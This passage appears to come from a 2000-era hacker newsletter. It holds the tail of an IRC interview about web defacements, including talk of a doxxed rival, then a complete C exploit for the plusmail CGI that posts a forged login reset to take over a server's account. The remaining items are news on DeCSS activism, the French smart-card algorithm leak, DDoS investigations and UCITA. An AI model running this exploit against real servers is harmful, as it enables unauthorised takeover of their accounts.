"He" claims he could have redefaced my stuff easily [15:45] this is funny again since he had to come and ask me to do his chores. [15:45] yeah in the interview he said [15:45] [20:03] i had someone akicked from #hackers on dalnet, [15:45] the kid retaliated, what can i say? [15:45] And even if he did know how to redeface my stuff he wouldn't have gotten [15:45] very far since I patched all the box's I hacked. [15:45] [20:04] that would be blazinweed, he is basically a [15:45] wannabe with no skills to speak of. [15:45] [20:04] i would have re-defaced his stuff easily [15:45] (nt boxen), but i'm not down with that anymore. [15:45] ... [15:45] He also highlights the fact [15:45] that they were only NT boxes that were defaced well i'd like to respond to this by saying i only deface NT boxes because i have no use for them but the unix boxes I keep btw he runs windows :D [15:45] good point [15:46] I'd also like to say a few things about the plusmail exploit [15:46] that he and ytcracker talked about. I've never heard so much bull ever. [15:46] the Hole was found by Herf (of wkD which is my group also) [15:46] but people take notice of defacements because they are 'public' and summarily judge people in the 'scene' by their web 'hacks' [15:46] and all it required was a simple html file that you loaded in your browser [15:46] which then allowed you to bypass the login screeen on dumb servers running plusmail.btw the scanner was written by ytcracker and it was useless anyway since next to no servers run the vulnerable package and the ones that do have long since patched it. [15:47] This is the reason you didn't see it get a slot at securityfocus. [15:47] * plusmail cgi exploit [15:47] - missnglnk [15:47] greets: herf, ytcracker, mosthated, tino [15:47] that one? or a variant [15:47] variant [15:47] ok [15:47] thats on packetstorm btw [15:47] I was one of the first people to have it [15:48] http://packetstorm.securify.com/0001-exploits/plusmail.c [15:48] hrm [15:49] have you confronted sect0r about his comments? [15:49] if so what happened [15:49] if not why not [15:49] :) [15:49] he left before i could [15:50] someone found all his personel info [15:50] nod I'm aware of that [15:50] and he is gone to hide [15:52] anything else you'd like to say? there isn't that much we haven't covered really [15:53] we don't need to drag it out [15:53] :) [15:53] :D [15:53] I think i've readdressed the balance [15:53] do you guys have a site for instance? [15:53] website that is [15:53] yeah but its private [15:54] if you think of anything to add lemme know [15:54] ok [15:54] my email is cruciphux@dok.org [15:54] thanks [15:54] if i'm not online [15:54] tnx [15:54] -end- Session Close: Sun Mar 19 15:55:19 2000 @HWA 07.0 plusmail cgi exploit ~~~~~~~~~~~~~~~~~~~~ /* * plusmail cgi exploit - missnglnk greets: herf, ytcracker, mosthated, tino */ #include #include #include #include #include #include #include #include #include #include #include #include extern int errno; int main(int argc, char **argv) { int argswitch, tport = 80, sockfd, plen, cltlen, lport = 4040; char *target, tmpdata[32768], *password = "default", *username = "jackdidntsetone", pdata[1024], *errcode, *tmpline, *firstline, clntfd, origdata[32768], htmldata[32768]; struct sockaddr_in rmt, srv, clt; struct hostent *he; unsigned long ip; if (argc < 5) { printf("plusmail cgi exploit by missnglnk\n"); printf("%s [-h hostname/ip ] [-p target port] [-u username] [-n newpassword] [-l optional local port]\n", argv[0]); return -1; } while ((argswitch = getopt(argc, argv, "h:p:u:n:l:v")) != -1) { switch (argswitch) { case 'h': if (strlen(optarg) > MAXHOSTNAMELEN) { printf("ERROR: Target hostname too long.\n"); return -1; } target = optarg; break; case 'p': tport = atoi(optarg); break; case 'n': if (strlen(optarg) > 8) { printf("Password length greater than 8 characters.\n"); return -1; } password = optarg; break; case 'u': if (strlen(optarg) > 8) { printf("Username length greater than 8 characters.\n"); return -1; } username = optarg; break; case 'l': lport = atoi(optarg); break; case '?': default: printf("plusmail cgi exploit by missnglnk\n"); printf("%s [-h hostname/ip ] [-p target port] [-u username] [-n newpassword] [-l optional local port]\n", argv[0]); return -1; break; } } argc -= optind; argv += optind; bzero(&rmt, sizeof(rmt)); bzero(&srv, sizeof(srv)); bzero(&clt, sizeof(clt)); bzero(tmpdata, sizeof(tmpdata)); cltlen = sizeof(clt); if ((he = gethostbyname(target)) != NULL) { ip = *(unsigned long *) he->h_addr; } else if ((ip = inet_addr(target)) == NULL) { perror("Error resolving target"); return -1; } rmt.sin_family = AF_INET; rmt.sin_addr.s_addr = ip; rmt.sin_port = htons(tport); srv.sin_family = AF_INET; srv.sin_addr.s_addr = INADDR_ANY; srv.sin_port = htons(lport); if ((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) { perror("Error creating socket"); return -1; } if (connect(sockfd, (struct sockaddr *) & rmt, sizeof(rmt)) < 0) { perror("Error connecting"); return -1; } snprintf(pdata, sizeof(pdata), "username=%s&password=%s&password1=%s&new_login=missnglnk", username, password, password); plen = strlen(pdata); snprintf(tmpdata, sizeof(tmpdata), "POST /cgi-bin/plusmail HTTP/1.0\n" \ "Referer: http://www.pure-security.net\n" \ "User-Agent: Mozilla/4.08 [en] (X11; I; SunOS 5.7 missnglnk)\n" \ "Host: %s\n" \ "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\n" \ "Accept-Encoding: gzip\n" \ "Accept-Language: en\n" \ "Accept-Charset: isp-8859-1,*,utf-8\n" \ "Content-type: application/x-www-form-urlencoded\n" \ "Content-length: %d\n" \ "\n%s\n", target, plen, pdata); if (write(sockfd, tmpdata, strlen(tmpdata)) < strlen(tmpdata)) { perror("Error writing data"); return -1; } bzero(tmpdata, sizeof(tmpdata)); while (read(sockfd, tmpdata, sizeof(tmpdata)) != 0) { strncpy(origdata, tmpdata, sizeof(origdata)); firstline = strtok(tmpdata, "\n"); bzero(tmpdata, sizeof(tmpdata)); if ((errcode = strstr(firstline, "404")) != NULL) { printf("plusmail.cgi aint here buddy.\n"); return -1; } for ((tmpline = strtok(origdata, "\n")); tmpline != NULL; (tmpline = strtok(NULL, "\n"))) { if ((errcode = strstr(tmpline, "

\n", htmldata, target); snprintf(htmldata, sizeof(htmldata), "%s\n", htmldata, target); } else { // sprintf(htmldata, "%s%s\n", htmldata, tmpline); snprintf(htmldata, sizeof(htmldata), "%s%s\n", htmldata, tmpline); } } } if (close(sockfd) < 0) { perror("Error closing socket"); return -1; } strncat(htmldata, "\n
<missnglnk>\0", sizeof(htmldata)); if ((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) { perror("Error creating socket"); return -1; } printf("waiting on port %d...", lport); if (bind(sockfd, (struct sockaddr *) & srv, sizeof(srv)) < 0) { perror("Error binding to socket"); return -1; } if (listen(sockfd, 0) < 0) { perror("Error setting backlog"); return -1; } if ((clntfd = accept(sockfd, (struct sockaddr *) & clt, &cltlen)) < 0) { perror("Error accepting connection"); return -1; } printf("connection from %s:%d\n", inet_ntoa(clt.sin_addr), ntohs(clt.sin_port)); if (!write(clntfd, htmldata, sizeof(htmldata))) { perror("Error writing data"); return -1; } if (close(clntfd) < 0) { perror("Error closing socket"); return -1; } printf("\n%s\n", htmldata); return 0; } @HWA 08.0 2600 activism against the MPAA ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.2600.com/ http://www.2600.com/news/2000/0130.html February 2, 2000 FOR IMMEDIATE RELEASE DAY OF ACTION PLANNED AGAINST MOTION PICTURE ASSOCIATION IN 100 CITIES Members of the hacker and open source communities worldwide, along with various civil liberties groups, are planning a massive leafletting campaign on Friday, February 4 to call attention to the recent attempts by the Motion Picture Association of America to shut down thousands of websites. Lawsuits have been filed against hundreds of people, as well as an Internet Service Provider and a magazine, for having information the MPAA wants to keep secret. The controversy centers around a computer program known as DeCSS, thought to be written by a 16 year old in Norway. The program defeats the encryption scheme used by DVD's which prohibits them from being viewed on non-approved machines or computers. It also enables DVD's from one country to be played in another, contrary to the wishes of the movie industry. It does NOT facilitate DVD piracy - in fact, copying DVD's has been possible since their introduction years ago. In its press releases on the subject, the MPAA has claimed that this is a piracy issue and they have subsequently succeeded in getting injunctions against a number of sites that had posted the program in the interests of free speech. This is in effect a lawsuit against the entire Internet community by extremely powerful corporate interests. The lawsuit and the various actions being planned promise to be a real showdown between two increasingly disparate sides in the technological age. The consequences of losing this case are so serious that civil libertarians, professors, lawyers, and a wide variety of others have already stepped forward to help out. Friday's action will be coordinated in 74 cities throughout North America and 26 cities in other parts of the world. Leafletting will take place outside theaters and video stores in these cities - all of which participate in a monthly "2600" gathering. 2600 Magazine has been named in two lawsuits regarding the DeCSS program and has joined with the the growing number of people who will fight these actions by the MPAA until the end. The lawsuit has been filed by the Motion Picture Association of America, Columbia/Tristar, Universal City Studios, Paramount Pictures, Disney Enterprises, Twentieth Century Fox, Metro-Goldwyn-Mayer Studios, and Time Warner Entertainment. Contact: Emmanuel Goldstein (631) 751-2600 ext. 0 leaflet campaign: ~~~~~~~~~~~~~~~~~ CALL TO ACTION 01/30/00 Thousands of copies of the flyer have already been distributed at movie theaters worldwide. Versions are also being made in different languages. The next step will involve a massive action this Friday, February 4, 2000. We call on all 2600 meetings held around the world on that day to head to the local theaters and spread the word of this travesty of justice by handing out as many flyers as possible. Everyone is invited to show up and participate, bring your friends, tell your local Linux User Group, spread the news to any organization you're part of, and join us in advocating justice. We find that once people are made aware of the facts of the case, they become as outraged as we have. TIPS FOR HANDING OUT FLYERS First, make sure you make the flyers distinctive by printing on colored paper if at all possible. The quickest way to do this is to go to a copy shop. Get several hundred at the very least - you WILL go through them quickly. Make sure you can print more if you need them. Familiarize yourself with the facts of the case as presented on www.opendvd.org. It's important to be able to answer questions of people who are interested in learning more. Remember, this is NOT about DVD piracy - that is how the movie industry is trying to portray this case. The issue here is CONTROL of players - whether you have the right to play DVD's on the computer of your choice and whether you should be able to see DVD's from other countries. As well as our freedom to continue reporting on the events, developments and discoveries of the hacker community, in a full and accurate manner. We find that people respond well to "Protect Your Rights" as a catch phrase to get them to take the flyer. Let us know if others work for you. Be courteous to the people passing by - don't block their path and, if they ignore you or even make a snide remark, don't heckle them. We find that the vast majority of people are polite and interested in what you have to say. You'll find that some will even come up to you asking for more flyers! Have a set of master copies (printed on white paper) for others to make copies of their own and hand out in other places. If you are asked to leave by theater management, cooperate and ask them where they would like you to stand. They can't force you to leave the area, only the part that is their property. You can still successfully hand out material to everyone coming and going by positioning yourself in neighboring areas or even in the parking lot. If things become unpleasant, simply head to another theater in a different part of town. (If you run out of theaters, you can always fall back on video stores.) We find that 90% of such confrontations can be averted by befriending security guards and making it clear that you don't intend to be disruptive. @HWA 09.0 Microsoft sends magazine full versions of Windows 2000 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by TRDonJuan (Translated from German by Babelfish) http://www.pcwelt.de/content/news/newwindows/2000/03/xn160300005.html Microsoft gave away inadvertently 100,000 Windows-2000-Kopien in the value of approximately 33 million dollar to private users. How the Spanish intelligence service Brujula.com reports, Microsoft wanted to actually pack on 120 days the limited version of the operating system on booklet DS, those approximately 100,000 outputs of the Spanish PC WELT sister " PC World " supplements. Afterwards it turned out however that it concerned at the software a temporally unlimited version inclusive Registrations code. Thus 100,000 installations of Windows are 2000 without license in the circulation. And with a selling price of 330 dollar per copy might have developed for Microsoft a financial damage of 33 million dollar. Who caused the error, is not certain officially. Insider assume however not the magazine, but Microsoft is responsible for the breakdown. Some whisper even, Microsoft -=- Win 2000 gratis auf CD Microsoft hat versehentlich 100.000 Windows-2000-Kopien im Wert von rund 33 Millionen Dollar an private Anwender verschenkt. Wie der spanische Nachrichtendienst Brujula.com berichtet, wollte Microsoft eigentlich die auf 120 Tage limitierte Version des Betriebssystems auf Heft-CDs packen, die rund 100.000 Ausgaben der spanischen PC-WELT-Schwester "PC World" beilagen. Im Nachhinein stellte sich jedoch heraus, dass es sich bei der Software um eine zeitlich unbegrenzte Version inklusive Registrations-Code handelte. Damit sind 100.000 Installationen von Windows 2000 ohne Lizenz im Umlauf. Und bei einem Verkaufspreis von 330 Dollar pro Kopie d�rfte Microsoft ein finanzieller Schaden von 33 Millionen Dollar entstanden sein. Wer den Fehler verursacht hat, steht offiziell noch nicht fest. Insider gehen jedoch davon aus, dass nicht die Zeitschrift, sondern Microsoft selbst f�r die Panne verantwortlich ist. Manche munkeln sogar, Microsoft habe die Vollversion absichtlich auf die CDs gepackt, um die Verkaufszahlen von Windows 2000 in die H�he zu treiben, und das Ganze anschlie�end als Versehen deklariert. Denn aufgrund der Monopolstellung, die dem Software-Riesen angekreidet wird, k�nne er das Betriebssystem nicht offiziell verschenken. Die Ausgabe der PC World Spanien, der die CD-ROM beilag, erzielte auf jeden Fall einen Verkaufsrekord. (PC-WELT, 16.03.2000, sp) @HWA 10.0 HNN:Mar 13th:Mexican Rebels Breached Pentagon Security ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by William Knowles According to Arthur L. Money, the chief information officer of the US Defense Department, Mexican Zapatista guerrillas managed to breach the online security systems of some pentagon computers in 1998. Money said that the intruders used systems from the Frankfurt Stock Exchange to launch their attacks. Agence France-Press - via Nando Times http://www.techserver.com/noframes/story/0,2294,500179791-500236658-501166899-0,00.html (Sorry: 404 or expired story link) @HWA 11.0 HNN:Mar 13th:Online Guerrilla War Rages In Brazil ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond Online warez groups fighting amongst each other is now considered guerrilla warfare by authorities in Brazil. According to the daily O Globo the Brazilian Hacker Organization (OHB) and the Anti-OHB have been trading insults via web defacements for some time. The Sao Paulo Civil Police Cybercrime Unit is also following attacks by three other active organizations: Hatted Copr, InfernBr and Crime Boys. EFE via COMTEX - via Northern Light http://library.northernlight.com/FC20000310060000049.html?cb=0&dx=1006&sc=0#doc (Pay to play document sorry ... - Ed) @HWA 12.0 HNN:Mar 13th:French Bank Card Algorithm Released ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by alan.hop Serge Humpich was sentenced to a ten month suspended sentence after notifying the French bank, Cartes Bancaires, that its bank cards where vulnerable to fraud. Now the secret that Humpich discovered has been released to the Internet. Bank officials say that the potential for fraud or fake cards is small while security experts fear that the underground will flood the market with fake cards within weeks. Reuters - via Yahoo http://dailynews.yahoo.com/h/nm/20000310/wr/france_cards_1.html Friday March 10 3:07 PM ET Card Alert for French Banks By Catherine Bremer PARIS (Reuters) - France braced for a wave of petty fraud after officials admitted on Friday that a formula posted on the Internet showed how to forge smart payment cards. But Cartes Bancaires, the French interbank group whose card system is affected, said there was no danger that bank accounts would be emptied. Cards made with the formula might be used to buy train tickets or pay parking meters or toll booths although there was no evidence this had actually happened, Cartes Bancaires spokesman Herve de Lacotte told Reuters. ``For the first time in 10 years, a lock has been sprung,'' he said. ``But springing a lock will not necessarily open the door and let you in. There is a theoretical risk of fraud but the problem concerns banks, not consumers or shops.'' Despite claims to the contrary, Lacotte said, false cards made with the code could not be used in cash dispensers, to make shop purchases or for expensive goods. Newspapers leaped on the story, quoting experts as saying the complex 96-digit code could be used to forge three in four of France's 34 million bank cards. Headlines like ``Chip card secret out'' left anyone with a bank card wondering whether their money was safe. ``Consumers have been paying for bank cards that aren't even secure. They've been cheated and lied to,'' said Eric April, Secretary-General of the AFOC consumer group. Lacotte said the scare stories were over the top and the Bank of France accused the press of ``exaggerating the risk.'' ``Even if certain clues relating to this algorithm have been made public... other security measures exist enabling strong limits on the use that can be made of this information,'' the French central bank said in a statement. Cards issued since last autumn had added security which meant the pirate formula would not work for them, he added. SCSSI, the government body in charge of information security systems, urged banks to replace older cards with updated ones. The card formula was posted anonymously on Internet chat site last weekend. It was actually discovered three years ago by computer whizz kid Serge Humpich, who denies using it or circulating but has been given a 10-month suspended prison sentence for cracking the banks' secret. Now that it is public, Humpich says, pirates could buy a chip card kit for around $370 and be turning out false cards within weeks. ``A few weeks from now dozens of false cards are going to appear,'' he told Liberation. @HWA 13.0 HNN:Mar 13th:Still No Suspects in DDoS Attacks ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond Investigators are still sifting through mountains of log files but are having a rough time tracing the recent denial of service attacks against online giants Yahoo, ZD Net, CNN, and others. Officials still do not have any suspects and hope that more traditional methods will allow them to locate the culprit(s). San Jose Mercury News http://www.mercurycenter.com/svtech/news/indepth/docs/hack031000.htm Posted at 8:28 p.m. PST Thursday, March 9, 2000 No suspects in cyberattacks Investigators try to track down origin of last month's assaults BY DAVID L. WILSON Mercury News Washington Bureau WASHINGTON -- Federal authorities are continuing to investigate last month's series of attacks on commercial Internet sites, but sources close to the investigation say they have no suspects yet. Investigators are sifting through mountains of data, trying to track the attacks back to their origin using logs from the computers involved, but they concede that building a case using such methods may be difficult, if not impossible. Some believe that a break in case is more likely to come from more traditional methods. ``Often what you see in a cold case is a lead coming from someone who is in custody on an unrelated minor charge who offers information in return for a get-out-of-jail-free card,'' said one person with ties to the investigation. ``If somebody brags that he was behind this, eventually somebody else will roll over on him.'' Often, however, the braggarts are blowing smoke. For instance, a 17-year-old who goes by the moniker ``Coolio'' hinted in online chats that he was behind at least some of the attacks. But federal authorities say there is no evidence that the youth, Dennis Moran of Wolfboro, N.H., was involved. However, Wednesday Moran was charged with two counts of unauthorized access to a computer system in connection with vandalism to the Los Angeles Police Department Web site DARE.com. In last month's attacks on popular Web sites such as Yahoo, eBay and CNN, suspects used a specialized technique known as a distributed denial of service attack. The technique depends on stealth software that has been secretly installed on hundreds of computers connected to the Internet. At a given signal, the programs attack a targeted Web site, flooding it with so much data that normal business is impossible. Investigators are using log files from the computers infected with the stealth software, hoping to track the trail back to the individual who installed the programs, but they have been unsuccessful so far. The difficulties investigators face were summed up in a 60-page report the federal government released Thursday. In a news conference discussing the report, Attorney General Janet Reno said law enforcement faces a number of challenges in cyberspace. ``These challenges include the inability to trace criminals who hide their identities online, difficulty in finding criminals who might be located in other jurisdictions, the need for better coordination among law enforcement agencies, and the need for trained personnel at all levels of law enforcement,'' Reno told reporters. The report generally said that existing laws could deal with crimes in cyberspace. In addition, while highlighting advantages criminals can gain from anonymity on the Internet, the report stressed that anonymity is both important and useful for average citizens. It suggested that any proposed changes in the availability and use of anonymity must be considered very carefully. Despite the report's measured tone, some groups feared a loss of privacy for individuals who could find their every movement in cyberspace tracked if they couldn't maintain anonymity. The American Civil Liberties Union blasted the report in a letter to Reno. ``An end to Internet anonymity would chill free expression in cyberspace,'' the letter declared. ``However, the report treats the anonymity of Internet users as a `thorny issue' rather than a constitutional right.'' Administration officials said the report was merely a starting point for an examination of security in cyberspace, and that the government was fully committed to maintaining privacy for Internet users. Contact David L. Wilson at (202) 383-6020 or dwilson@sjmercury.com @HWA 14.0 HNN:Mar 13th:Japanese Pirates Busted ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench In a report released on March 10th, the Associated Computer Software Copyright Society (ACCS) disclosed two recent cases of piracy involving Internet bulletin boards. A Hokkaido University student living in Sapporo was arrested for selling as many as 30 illegal copies of Microsoft's Office 2000 Professional and other software. He charged a total of 500,000 yen (US$4,693.51) for the CDR copies. A 24-year-old worker living in Takasaki, Gunma prefecture was also recently arrested for advertising and selling illegal software via an Internet bulletin board. He sold software to 20 people for 100,000 yen (US$938.70). He said that he began selling pirated software after he purchased some in the same way. Asia Biz Tech http://www.nikkeibp.asiabiztech.com/wcs/leaf?CID=onair/asabt/news/96759 Pirated Software Sales Rampant on Internet Bulletin Board March 13, 2000 (TOKYO) -- A series of recent cases have revealed the extent to which Internet bulletin boards are being used in Japan to sell pirated software. The Associated Computer Software Copyright Society (ACCS) disclosed the extent of the situation on March 10. In just the last 10 days, two cases of copyright violation have been brought to light by the Metropolitan Police Agency and the Aichi Prefecture Police. On Feb. 29, the Metropolitan Police Agency submitted documents to the Tokyo District Public Prosecutors Office regarding the activities of a 22-year-old Hokkaido University student living in Sapporo. The student was using an electronic bulletin board to advertise the sale of pirated software and was accepting orders via e-mail. The items included Microsoft's Office 2000 Professional as well as other office and game software copied to CD-R disks without the copyright holders' permission. Between February and October 1999, the student reportedly sold illegally copied software to some 30 individuals nationwide for a total of about 500,000 yen. (106.53 yen = US$1) The other incident, uncovered by the high-tech crime unit of the Aichi Prefecture Police, involved a 24-year-old worker living in Takasaki, Gunma prefecture. A report on the suspect was submitted to the Nagoya District Public Prosecutors Office on March 1. Like the Sapporo student, the suspect is accused of using a bulletin board operated by a leading Internet service provider to advertise the sale of pirated software and accept online orders. The accused is believed to have sold the software to 20 people during the course of about one month, generating some 100,000 yen in sales. He reportedly confessed that he began selling pirated software after buying it in a similar manner himself. (BizTech News Dept.) @HWA 15.0 HNN:Mar 13th:Online Handles Impose Fear ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond Do the handles chosen by online hooligans chosen in an attempt to impose fear? Matt Richtel of the NY Times attempts to explore the meanings of some of the more glamorous handles of the online world. (To bad he completely misses the personal privacy angle. And what about entertainers like Sting, Madonna, John Couger, or Prince?) NY Times http://www.nytimes.com/library/review/031200hacker-handles-review.html (Pay to play url... sorry -Ed) @HWA 16.0 HNN:Mar 13th:Vendors Still Making Insecure Software ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond At a recent congressional panel examining the threat to federal and private-sector computer networks cyber security experts blamed software manufacturers for failing to improve the security features of most consumer software.(People in the underground have been saying this for years.) Reuters - via Excite http://news.excite.com/news/r/000309/15/net-tech-hacker (Server:We're sorry, but this story is not currently available - Ed) @HWA 17.0 HNN:Mar 14th:Smart Card Inventor Issues Challenge ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by acoplayse Roland Moreno, whose smart cards he invented have slashed the fraud rate in France by 90 percent in 10 years, rejected claims that an algorithm posted on a Web chat site last week could bypass the cards safeguards. He is so confident of his product that he is offering a million francs ($148,100) to anyone who could prove that they could read a bank's confidential code from the card. Moreno went on to claim that "chip cards are an unpenetrable data system." (So unpenetrable that Serge Humpich recently received a 10 month suspended sentence for defeating the system.) Reuters http://newsnet.reuters.com/cgi-bin/basketview.cgi?b=rcom:science&s=nL133221 From above url; "Boston conventions threaten biotech food fight"... (Appears to be incorrectly linked .. not having much luck following up articles this week :/ sorree .. - Ed) @HWA 18.0 HNN:Mar 14th:MPAA Continues to Harass In Fight Over DeCSS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Macki In the past two months the Motion Picture Association of America has continued to harass and intimidate Internet users all over the world. Letters have been sent, threats have been levied, ISPs have crumbled, people have been fired from their jobs and worse. The fight is not over. 2600 http://www.2600.com/news/2000/0312.html Open DVD http://www.opendvd.org/ @HWA 19.0 HNN:Mar 14th:Tracking Down Coolio ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Carlos Log file analysis and a search engine, those where the most complicated tools needed to track down Coolio (Dennis Moran). Coolio was charged last week with defacing the Dare.org web site. (And this is what the FBI wants all that extra money for?) Associated Press - via ABC News http://www.abcnews.go.com/sections/tech/DailyNews/coolio000313.html On the Trail of a Hacker Court Papers Reveal How Cyber Gumshoe Tracked Teen Dennis Moran, 17, who goes by the name "Coolio" on the Internet, talks with reporters March 8, near his Wolfeboro, N.H., home after being questioned by the FBI about crippling attacks on major Web sites in February. (Ken Williams/Concord Monitor/AP Photo) http://www.abcnews.go.com/media/Tech/images/ap_hacker_000313_h.jpg The Associated Press W O L F E B O R O, N.H., March 13 Recently released court records explain how authorities traced the hacking attack on a popular anti-drug Web site to a Wolfeboro teenager. Dennis Moran, 17, was charged last week with hacking into the Web site of DARE.org and defacing it with pro-drug abuse slogans and images. He has acknowledged he vandalized the Los Angeles-based site and two others, but said he was only joking when he claimed responsibility for the attacks that crippled Yahoo, eBay and other major sites last month. Court records released Friday show police began investigating Moran after noticing his Internet nickname, Coolio, on the defaced DARE.org site in November. At the bottom of the Web site were the messages Coolio is k-r4d and so are drugs and Craftily owned by Coolio :D. Searching in Cyberspace Los Angeles Police Detective Michael Brausman used a search engine to find a Web page that included an e-mail address for Cooliok-r4d.com. He traced the address to another site that included a directory labeled Coolio. Inside the directory was one of the images posted on the DARE site. By late December, the detective had contacted the owner of an Arizona-based server who confirmed he had e-mail messages related to the Coolio directory. A search of the server�s logs showed someone using the e-mail address cooliok-r4d.com had sent messages that included Moran�s name, address and phone number. In one message, Moran inquired about registering cool.io as an Internet domain name. If there�s any way I could buy the domain for this, please email me pricing and information. Thanks, Dennis Moran, he wrote. Brausman called Wolfeboro police Dec. 30. Investigators interviewed Moran on Feb. 17. Moran faces two state charges of unauthorized access to a computer system. Each felony is punishable by up to 15 years in prison and a $4,000 fine. Although Moran also was questioned by the FBI about several denial of service attacks on major commercial sites, including Yahoo.com and eBbay.com, no charges have been filed in those cases. Investigators said they were seeking someone using the Internet signer Coolio in those attacks, but also said the name is used by many people online. @HWA 20.0 HNN:Mar 14th: DOJ Launches Cybercrime Site ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench The US Department of Justice has officially launched a cybercrime web site defining computer crime and describing how to report it. The site also includes department's latest thinking on privacy vs. policing on the Internet as well as computer search and seizure guidelines. Associated Press - via Nando Times http://www.techserver.com/noframes/story/0,2294,500180192-500237416-501173875-0,00.html (Sorry dead link ... -Ed :( ) Cybercrime.gov http://www.cybercrime.gov/ @HWA 21.0 HNN:Mar 14th: China Relaxes Crypto Rules ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by acoplayse After pressure from the US-China Business Council Chinese authorities have agreed to "clarify" encryption regulations that where published in October last year. the State Encryption Management Commission (SEMC), which reports to the Ministry of State Security, has said that only hardware or software for which encryption is a core function will be limited by the regulations. products that contain encryption as a secondary function will no longer be restricted. This includes browsers, consumer electronics and other items. Financial Times http://news.ft.com/ft/gx.cgi/ftc?pagename=View&c=Article&cid=FT3ZAN1CS5C& live=true&useoverridetemplate=ZZZFKOXOA0C&tagid=ZZZC00L1B0C&subheading= information%20technology&_ref=526610871 China softens rules on encryption By James Kynge - 13 Mar 2000 22:06GMT China has backed away from sweeping restrictions on the use and sale of foreign encryption technology that would have wreaked havoc on the use of foreign software, mobile phones, e-mail and other communications applications. The US-China Business Council, which led a lobbying effort that united several national chambers of commerce in Beijing, said on Monday that Chinese authorities had agreed to "clarify" encryption regulations published in October last year. The main sense of the clarification was that only hardware or software for which encryption is a core function will be limited by the regulations of the State Encryption Management Commission (SEMC), a body that reports to China's intelligence agency, the Ministry of State Security. This means that mobile phone handsets, windows software, browser software and other applications that contain encryption as an ancillary function will not now be restricted. Windows 2000, Microsoft Corp's newest operating system, which is set to be launched in China on March 20, was given approval for sale this month by authorities, prefiguring the relaxation in SEMC's rules. It was not immediately clear what types of products would fall under the definition of having encryption as a core function. Under the SEMC's original restrictions, all businesses and individuals would have had to register with the government any products containing encryption technology. They then would have had to apply for permission to use the goods. But a clarification letter issued by the SEMC allayed fears the government would gain access to corporate secrets carried in encoded communications by requiring companies to hand over their encryption source codes. Business travellers carrying laptops with ordinary software, even if it contains some encryption capabilities, are not required to register, the US-China Business Council quoted the SEMC as saying in a verbal clarification of the regulations. @HWA 22.0 HNN:Mar 14th:Stallman on UCITA ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond The Uniform Computer Information Transaction Act will threaten the existence of free software if passed. Richard Stallman the founder of the Free Software Foundation has spoken out vehemently about this legislation and continues to do so. ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2457092,00.html Interview: GNU guru Richard Stallman The president of the Free Software Foundation and founder of the free-software movement speaks out against UCITA. By Robert Lemos, ZDNet News March 12, 2000 3:44 PM PT When Richard Stallman founded the GNU (or Gnu's Not Unix) Project in 1984, his aim was to create Unix-compatible tools that were free. Sixteen years later, GNU software is a critical part of most Unix systems and forms the basis -- along with Linus Torvalds' Linux kernel -- of all Linux systems. With the proposed Uniform Computer Information Transaction Act (UCITA) threatening the free-software movement, ZDNet News Senior Editor Robert Lemos caught up with Stallman, president of the Free Software Foundation, in India. ZDNet: What will be the effect of UCITA on the free software movement? Stallman: UCITA would make it harder for us to avoid liability for bugs that turn up in the free software we develop -- while giving proprietary software developers a very easy way to avoid all liability for their products, even for faults that they know about in advance. This is grossly unfair. UCITA would also give proprietary software developers a way to prohibit reverse engineering. They could then promulgate secret formats for distributing and storing data and stop us from implementing free software to handle those formats. We would be unable to provide you with software to access your own data. ZDNet: What will be the effect on GNU development? What about GNU/Linux? Stallman: I don't expect UCITA to have any immediate effect on our software development. But in the long term we will probably have trouble making our software handle the secret data formats and support new hardware whose specifications are secret. Microsoft already said they plan to use secret formats and protocols to block the development of (GNU/) Linux. The format of Word is already a secret, and it is only through reverse engineering that people can figure out anything about it. ZDNet: Will software be worse because of UCITA? Stallman: That is the wrong question. The right question is how will users of software be worse off because of UCITA? I've already explained the problems free software will face. We will face additional obstacles to doing a good job. For non-free software, developers will not face additional obstacles, but they will be able to restrict the users in onerous ways. So even if the software is unchanged, the users will be worse off. For example, the owners will be able to change the software license at any time, restricting what you are allowed to do with a program. They will be able to send you e-mail containing new conditions, and these new conditions will be legally binding on you even if you never actually got the mail. If you do see the mail and you reject the new conditions, they will be able to demand that you stop using the program -- and even send your machine a message across the network to turn off the program without a moment's notice. ZDNet: If there is so much opposition, why has the BSA, and others, had so much success in pushing the bill through? Stallman: As far as I know, they have succeeded in one state. The term "so much success" seems to be an exaggeration. I don't know why they succeeded in Virginia; I can only guess. But here are some things, which are not unusual, which may have happened this time: 1.The supporters of UCITA probably are better organized and have more 